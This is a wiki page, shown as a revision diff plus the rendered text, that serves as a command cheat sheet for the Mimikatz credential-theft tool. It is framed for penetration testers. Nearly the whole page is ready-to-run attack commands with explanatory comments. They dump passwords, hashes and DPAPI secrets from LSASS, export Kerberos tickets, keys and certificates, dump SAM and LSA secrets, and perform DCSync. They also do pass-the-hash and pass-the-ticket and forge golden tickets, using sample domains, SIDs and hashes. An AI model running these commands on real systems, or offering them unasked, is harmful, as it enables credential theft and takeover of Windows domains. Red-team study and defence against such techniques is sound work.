No edit summary |
No edit summary |
||
Line 1: | Line 1: | ||
[[Category:Tools]] | [[Category:Tools]] | ||
=Description= | |||
Mimikatz<ref>https://github.com/ParrotSec/mimikatz</ref> is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates. | |||
=Commands= | =Commands= | ||
==sekurlsa== | ==sekurlsa== | ||
Line 95: | Line 97: | ||
sekurlsa::ekeys | sekurlsa::ekeys | ||
</syntaxhighlight> | </syntaxhighlight> | ||
==dapi== | ==dapi == | ||
<syntaxhighlight lang="powershell"> | <syntaxhighlight lang="powershell"> | ||
# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory. | # Extracts Data Protection API (DPAPI) credentials from the LSASS process memory. | ||
Line 111: | Line 113: | ||
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi | kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi | ||
</syntaxhighlight> | </syntaxhighlight> | ||
==Golden & Silver Tickets== | ==Golden & Silver Tickets == | ||
<syntaxhighlight lang="powershell"> | <syntaxhighlight lang="powershell"> | ||
#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. | #Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. | ||
Line 126: | Line 128: | ||
kerberos::purge | kerberos::purge | ||
</syntaxhighlight> | </syntaxhighlight> | ||
=References= |
Revision as of 19:11, 25 January 2023
Description
Mimikatz[1] is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates.
Commands
sekurlsa
# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords
# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full
# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export
# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos
# This command will list and export Kerberos tickets to a file.
kerberos::list /export
# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi
# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto
This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi
# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng
# This command is used to export certificates from a Windows system.
crypto::certificates /export
# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export
# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export
vault & lsadump
Extracts credentials from the Windows Vault.
vault::cred
Lists the contents of the Windows Vault.
vault::list
Elevates the current user's privileges to that of the Local System account.
token::elevate
Reverts the current user's privileges to their previous state before elevation.
token::revert
Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam
Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets
Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache
Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
PTH
# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
ekeys
# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys
dapi
# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi
minidump
# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp
PTT
#Impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
Golden & Silver Tickets
#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
tgt
# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt
# Removes TGTs from memory.
kerberos::purge